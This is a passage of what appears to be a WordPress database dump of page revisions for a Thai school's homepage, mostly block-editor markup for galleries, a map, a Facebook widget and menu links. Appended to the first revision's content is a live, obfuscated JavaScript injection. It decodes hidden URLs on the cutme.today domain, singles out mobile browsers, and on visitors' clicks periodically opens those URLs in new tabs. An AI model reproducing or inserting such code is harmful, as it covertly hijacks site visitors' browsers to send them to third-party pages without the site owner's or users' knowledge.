href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-23 09:10:32','2024-08-23 02:10:32','',14,'http://pakhaeng.ssk.in.th/?p=1056',0,'revision','',0),
(1058,1,'2024-08-23 09:12:34','2024-08-23 02:12:34','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span 